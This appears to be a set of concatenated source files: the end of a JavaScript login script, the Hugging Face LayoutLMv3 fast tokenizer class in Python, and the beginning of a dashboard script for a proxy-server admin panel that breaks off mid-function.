body: JSON.stringify({
username: username,
password: password
})
})
.then(response => response.json())
.then(data => {
if (data.success) {
// 保存登录令牌
localStorage.setItem('token', data.token);
// 跳转到仪表盘
window.location.href = '/dashboard';
} else {
// 显示错误信息
errorMessage.textContent = data.message || '登录失败,请检查用户名和密码';
}
})
.catch(error => {
console.error('登录请求失败:', error);
errorMessage.textContent = '登录请求失败,请稍后重试';
});
});
}); |
27182812/ChatGLM-LLaMA-chinese-insturct | 40,182 | src/transformers/models/layoutlmv3/tokenization_layoutlmv3_fast.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fast tokenization class for LayoutLMv3. It overwrites 2 methods of the slow tokenizer class, namely _batch_encode_plus
and _encode_plus, in which the Rust tokenizer is used.
"""
import json
from typing import Dict, List, Optional, Tuple, Union
from tokenizers import pre_tokenizers, processors
from ...tokenization_utils_base import (
BatchEncoding,
EncodedInput,
PaddingStrategy,
PreTokenizedInput,
TensorType,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import add_end_docstrings, logging
from .tokenization_layoutlmv3 import (
LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING,
LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING,
LayoutLMv3Tokenizer,
)
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "vocab.json", "merges_file": "merges.txt", "tokenizer_file": "tokenizer.json"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/vocab.json",
"microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/vocab.json",
},
"merges_file": {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/merges.txt",
"microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/layoutlmv3-base": 512,
"microsoft/layoutlmv3-large": 512,
}
class LayoutLMv3TokenizerFast(PreTrainedTokenizerFast):
r"""
Construct a "fast" LayoutLMv3 tokenizer (backed by HuggingFace's *tokenizers* library). Based on BPE.
This tokenizer inherits from [`PreTrainedTokenizerFast`] which contains most of the main methods. Users should
refer to this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
trim_offsets (`bool`, *optional*, defaults to `True`):
Whether the post processing step should trim offsets to avoid including whitespaces.
cls_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [SEP] token.
pad_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (`int`, *optional*, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the `ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (`bool`, *optional*, defaults to `True`):
Whether or not to only label the first subword, in case word labels are provided.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
slow_tokenizer_class = LayoutLMv3Tokenizer
def __init__(
self,
vocab_file=None,
merges_file=None,
tokenizer_file=None,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=True,
trim_offsets=True,
cls_token_box=[0, 0, 0, 0],
sep_token_box=[0, 0, 0, 0],
pad_token_box=[0, 0, 0, 0],
pad_token_label=-100,
only_label_first_subword=True,
**kwargs,
):
super().__init__(
vocab_file,
merges_file,
tokenizer_file=tokenizer_file,
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
sep_token=sep_token,
cls_token=cls_token,
unk_token=unk_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
trim_offsets=trim_offsets,
cls_token_box=cls_token_box,
sep_token_box=sep_token_box,
pad_token_box=pad_token_box,
pad_token_label=pad_token_label,
only_label_first_subword=only_label_first_subword,
**kwargs,
)
pre_tok_state = json.loads(self.backend_tokenizer.pre_tokenizer.__getstate__())
if pre_tok_state.get("add_prefix_space", add_prefix_space) != add_prefix_space:
pre_tok_class = getattr(pre_tokenizers, pre_tok_state.pop("type"))
pre_tok_state["add_prefix_space"] = add_prefix_space
self.backend_tokenizer.pre_tokenizer = pre_tok_class(**pre_tok_state)
self.add_prefix_space = add_prefix_space
tokenizer_component = "post_processor"
tokenizer_component_instance = getattr(self.backend_tokenizer, tokenizer_component, None)
if tokenizer_component_instance:
state = json.loads(tokenizer_component_instance.__getstate__())
# The lists 'sep' and 'cls' must be cased in tuples for the object `post_processor_class`
if "sep" in state:
state["sep"] = tuple(state["sep"])
if "cls" in state:
state["cls"] = tuple(state["cls"])
changes_to_apply = False
if state.get("add_prefix_space", add_prefix_space) != add_prefix_space:
state["add_prefix_space"] = add_prefix_space
changes_to_apply = True
if state.get("trim_offsets", trim_offsets) != trim_offsets:
state["trim_offsets"] = trim_offsets
changes_to_apply = True
if changes_to_apply:
component_class = getattr(processors, state.pop("type"))
new_value = component_class(**state)
setattr(self.backend_tokenizer, tokenizer_component, new_value)
# additional properties
self.cls_token_box = cls_token_box
self.sep_token_box = sep_token_box
self.pad_token_box = pad_token_box
self.pad_token_label = pad_token_label
self.only_label_first_subword = only_label_first_subword
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.__call__
def __call__(
self,
text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
boxes: Union[List[List[int]], List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
"""
Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
sequences with word-level normalized bounding boxes and optional labels.
Args:
text (`str`, `List[str]`, `List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
(words of a single example or questions of a batch of examples) or a list of list of strings (batch of
words).
text_pair (`List[str]`, `List[List[str]]`):
The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
(pretokenized string).
boxes (`List[List[int]]`, `List[List[List[int]]]`):
Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
word_labels (`List[int]`, `List[List[int]]`, *optional*):
Word-level integer labels (for token classification tasks such as FUNSD, CORD).
"""
# Input type checking for clearer error
def _is_valid_text_input(t):
if isinstance(t, str):
# Strings are fine
return True
elif isinstance(t, (list, tuple)):
# List are fine as long as they are...
if len(t) == 0:
# ... empty
return True
elif isinstance(t[0], str):
# ... list of strings
return True
elif isinstance(t[0], (list, tuple)):
# ... list with an empty list or with a list of strings
return len(t[0]) == 0 or isinstance(t[0][0], str)
else:
return False
else:
return False
if text_pair is not None:
# in case text + text_pair are provided, text = questions, text_pair = words
if not _is_valid_text_input(text):
raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
if not isinstance(text_pair, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
else:
# in case only text is provided => must be words
if not isinstance(text, (list, tuple)):
raise ValueError(
"Words must be of type `List[str]` (single pretokenized example), "
"or `List[List[str]]` (batch of pretokenized examples)."
)
if text_pair is not None:
is_batched = isinstance(text, (list, tuple))
else:
is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
words = text if text_pair is None else text_pair
if boxes is None:
raise ValueError("You must provide corresponding bounding boxes")
if is_batched:
if len(words) != len(boxes):
raise ValueError("You must provide words and boxes for an equal amount of examples")
for words_example, boxes_example in zip(words, boxes):
if len(words_example) != len(boxes_example):
raise ValueError("You must provide as many words as there are bounding boxes")
else:
if len(words) != len(boxes):
raise ValueError("You must provide as many words as there are bounding boxes")
if is_batched:
if text_pair is not None and len(text) != len(text_pair):
raise ValueError(
f"batch length of `text`: {len(text)} does not match batch length of `text_pair`:"
f" {len(text_pair)}."
)
batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
is_pair = bool(text_pair is not None)
return self.batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
else:
return self.encode_plus(
text=text,
text_pair=text_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.batch_encode_plus
def batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[Union[List[int], List[List[int]]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._batch_encode_plus(
batch_text_or_text_pairs=batch_text_or_text_pairs,
is_pair=is_pair,
boxes=boxes,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.tokenize
def tokenize(self, text: str, pair: Optional[str] = None, add_special_tokens: bool = False, **kwargs) -> List[str]:
batched_input = [(text, pair)] if pair else [text]
encodings = self._tokenizer.encode_batch(
batched_input, add_special_tokens=add_special_tokens, is_pretokenized=False, **kwargs
)
return encodings[0].tokens
@add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.encode_plus
def encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = None,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[Union[str, TensorType]] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
"""
Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
`__call__` should be used instead.
Args:
text (`str`, `List[str]`, `List[List[str]]`):
The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
text_pair (`List[str]` or `List[int]`, *optional*):
Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
list of list of strings (words of a batch of examples).
"""
# Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
padding=padding,
truncation=truncation,
max_length=max_length,
pad_to_multiple_of=pad_to_multiple_of,
verbose=verbose,
**kwargs,
)
return self._encode_plus(
text=text,
boxes=boxes,
text_pair=text_pair,
word_labels=word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast._batch_encode_plus with LayoutLMv2->LayoutLMv3
def _batch_encode_plus(
self,
batch_text_or_text_pairs: Union[
List[TextInput],
List[TextInputPair],
List[PreTokenizedInput],
],
is_pair: bool = None,
boxes: Optional[List[List[List[int]]]] = None,
word_labels: Optional[List[List[int]]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[str] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
) -> BatchEncoding:
if not isinstance(batch_text_or_text_pairs, list):
raise TypeError(f"batch_text_or_text_pairs has to be a list (got {type(batch_text_or_text_pairs)})")
# Set the truncation and padding strategy and restore the initial configuration
self.set_truncation_and_padding(
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
)
if is_pair:
batch_text_or_text_pairs = [(text.split(), text_pair) for text, text_pair in batch_text_or_text_pairs]
encodings = self._tokenizer.encode_batch(
batch_text_or_text_pairs,
add_special_tokens=add_special_tokens,
is_pretokenized=True, # we set this to True as LayoutLMv3 always expects pretokenized inputs
)
# Convert encoding to dict
# `Tokens` has type: Tuple[
# List[Dict[str, List[List[int]]]] or List[Dict[str, 2D-Tensor]],
# List[EncodingFast]
# ]
# with nested dimensions corresponding to batch, overflows, sequence length
tokens_and_encodings = [
self._convert_encoding(
encoding=encoding,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=True
if word_labels is not None
else return_offsets_mapping, # we use offsets to create the labels
return_length=return_length,
verbose=verbose,
)
for encoding in encodings
]
# Convert the output to have dict[list] from list[dict] and remove the additional overflows dimension
# From (variable) shape (batch, overflows, sequence length) to ~ (batch * overflows, sequence length)
# (we say ~ because the number of overflow varies with the example in the batch)
#
# To match each overflowing sample with the original sample in the batch
# we add an overflow_to_sample_mapping array (see below)
sanitized_tokens = {}
for key in tokens_and_encodings[0][0].keys():
stack = [e for item, _ in tokens_and_encodings for e in item[key]]
sanitized_tokens[key] = stack
sanitized_encodings = [e for _, item in tokens_and_encodings for e in item]
# If returning overflowing tokens, we need to return a mapping
# from the batch idx to the original sample
if return_overflowing_tokens:
overflow_to_sample_mapping = []
for i, (toks, _) in enumerate(tokens_and_encodings):
overflow_to_sample_mapping += [i] * len(toks["input_ids"])
sanitized_tokens["overflow_to_sample_mapping"] = overflow_to_sample_mapping
for input_ids in sanitized_tokens["input_ids"]:
self._eventual_warn_about_too_long_sequence(input_ids, max_length, verbose)
# create the token boxes
token_boxes = []
for batch_index in range(len(sanitized_tokens["input_ids"])):
if return_overflowing_tokens:
original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
else:
original_index = batch_index
token_boxes_example = []
for id, sequence_id, word_id in zip(
sanitized_tokens["input_ids"][batch_index],
sanitized_encodings[batch_index].sequence_ids,
sanitized_encodings[batch_index].word_ids,
):
if word_id is not None:
if is_pair and sequence_id == 0:
token_boxes_example.append(self.pad_token_box)
else:
token_boxes_example.append(boxes[original_index][word_id])
else:
if id == self.cls_token_id:
token_boxes_example.append(self.cls_token_box)
elif id == self.sep_token_id:
token_boxes_example.append(self.sep_token_box)
elif id == self.pad_token_id:
token_boxes_example.append(self.pad_token_box)
else:
raise ValueError("Id not recognized")
token_boxes.append(token_boxes_example)
sanitized_tokens["bbox"] = token_boxes
# optionally, create the labels
if word_labels is not None:
labels = []
for batch_index in range(len(sanitized_tokens["input_ids"])):
if return_overflowing_tokens:
original_index = sanitized_tokens["overflow_to_sample_mapping"][batch_index]
else:
original_index = batch_index
labels_example = []
for id, offset, word_id in zip(
sanitized_tokens["input_ids"][batch_index],
sanitized_tokens["offset_mapping"][batch_index],
sanitized_encodings[batch_index].word_ids,
):
if word_id is not None:
if self.only_label_first_subword:
if offset[0] == 0:
# Use the real label id for the first token of the word, and padding ids for the remaining tokens
labels_example.append(word_labels[original_index][word_id])
else:
labels_example.append(self.pad_token_label)
else:
labels_example.append(word_labels[original_index][word_id])
else:
labels_example.append(self.pad_token_label)
labels.append(labels_example)
sanitized_tokens["labels"] = labels
# finally, remove offsets if the user didn't want them
if not return_offsets_mapping:
del sanitized_tokens["offset_mapping"]
return BatchEncoding(sanitized_tokens, sanitized_encodings, tensor_type=return_tensors)
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast._encode_plus
def _encode_plus(
self,
text: Union[TextInput, PreTokenizedInput],
text_pair: Optional[PreTokenizedInput] = None,
boxes: Optional[List[List[int]]] = None,
word_labels: Optional[List[int]] = None,
add_special_tokens: bool = True,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_tensors: Optional[bool] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
**kwargs,
) -> BatchEncoding:
# make it a batched input
# 2 options:
# 1) only text, in case text must be a list of str
# 2) text + text_pair, in which case text = str and text_pair a list of str
batched_input = [(text, text_pair)] if text_pair else [text]
batched_boxes = [boxes]
batched_word_labels = [word_labels] if word_labels is not None else None
batched_output = self._batch_encode_plus(
batched_input,
is_pair=bool(text_pair is not None),
boxes=batched_boxes,
word_labels=batched_word_labels,
add_special_tokens=add_special_tokens,
padding_strategy=padding_strategy,
truncation_strategy=truncation_strategy,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_tensors=return_tensors,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
**kwargs,
)
# Return tensor is None, then we can remove the leading batch axis
# Overflowing tokens are returned as a batch of output so we keep them in this case
if return_tensors is None and not return_overflowing_tokens:
batched_output = BatchEncoding(
{
key: value[0] if len(value) > 0 and isinstance(value[0], list) else value
for key, value in batched_output.items()
},
batched_output.encodings,
)
self._eventual_warn_about_too_long_sequence(batched_output["input_ids"], max_length, verbose)
return batched_output
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast._pad
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
"""
Pad encoded inputs (on left/right and up to predefined length or max length in the batch)
Args:
encoded_inputs:
Dictionary of tokenized inputs (`List[int]`) or batch of tokenized inputs (`List[List[int]]`).
max_length: maximum length of the returned list and optionally padding length (see below).
Will truncate by taking into account the special tokens.
padding_strategy: PaddingStrategy to use for padding.
- PaddingStrategy.LONGEST Pad to the longest sequence in the batch
- PaddingStrategy.MAX_LENGTH: Pad to the max length (default)
- PaddingStrategy.DO_NOT_PAD: Do not pad
The tokenizer padding sides are defined in self.padding_side:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
pad_to_multiple_of: (optional) Integer if set will pad the sequence to a multiple of the provided value.
This is especially useful to enable the use of Tensor Core on NVIDIA hardware with compute capability
`>= 7.5` (Volta).
return_attention_mask:
(optional) Set to False to avoid returning attention mask (default: set to model specifics)
"""
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
required_input = encoded_inputs[self.model_input_names[0]]
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(required_input)
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = padding_strategy != PaddingStrategy.DO_NOT_PAD and len(required_input) != max_length
# Initialize attention mask if not present.
if return_attention_mask and "attention_mask" not in encoded_inputs:
encoded_inputs["attention_mask"] = [1] * len(required_input)
if needs_to_be_padded:
difference = max_length - len(required_input)
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = encoded_inputs["attention_mask"] + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = encoded_inputs["bbox"] + [self.pad_token_box] * difference
if "labels" in encoded_inputs:
encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["labels"]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.save_vocabulary
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
files = self._tokenizer.model.save(save_directory, name=filename_prefix)
return tuple(files)
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
output = [self.bos_token_id] + token_ids_0 + [self.eos_token_id]
if token_ids_1 is None:
return output
return output + [self.eos_token_id] + token_ids_1 + [self.eos_token_id]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Args:
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not:
make use of token type ids, therefore a list of zeros is returned.
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
|
2833844911/cyTlsXhr | 42,478 | static/js/dashboard.js | document.addEventListener('DOMContentLoaded', function() {
// 检查登录状态
if (!localStorage.getItem('token')) {
window.location.href = '/';
return;
}
// 获取DOM元素
const logoutBtn = document.getElementById('logout-btn');
const navItems = document.querySelectorAll('.nav-menu li');
const panels = document.querySelectorAll('.panel');
const startProxyBtn = document.getElementById('start-proxy');
const stopProxyBtn = document.getElementById('stop-proxy');
const addUserForm = document.getElementById('add-user-form');
const settingsForm = document.getElementById('settings-form');
const resetStatsBtn = document.getElementById('reset-stats');
const addPortForm = document.getElementById('add-port-form');
const portsList = document.getElementById('ports-list');
// 初始化页面
updateProxyStatus();
loadUsers();
loadSettings();
loadStats();
loadProxyPorts();
// 设置定时刷新
setInterval(updateProxyStatus, 5000);
setInterval(loadStats, 10000);
setInterval(loadProxyPorts, 5000);
// 监听无需认证复选框变化
document.getElementById('no-auth-user').addEventListener('change', function() {
const passwordInput = document.getElementById('new-password');
if (this.checked) {
passwordInput.disabled = true;
passwordInput.required = false;
passwordInput.value = '';
} else {
passwordInput.disabled = false;
passwordInput.required = true;
}
});
// 监听代理转发复选框变化
document.getElementById('use-forward-proxy').addEventListener('change', function() {
const remoteProxySettings = document.getElementById('remote-proxy-settings');
if (this.checked) {
remoteProxySettings.style.display = 'block';
} else {
remoteProxySettings.style.display = 'none';
}
});
// 处理导航菜单点击
navItems.forEach(item => {
item.addEventListener('click', function() {
const tabId = this.getAttribute('data-tab');
// 更新活动标签
navItems.forEach(nav => nav.classList.remove('active'));
this.classList.add('active');
// 显示对应面板
panels.forEach(panel => {
if (panel.id === tabId + '-panel') {
panel.classList.add('active');
} else {
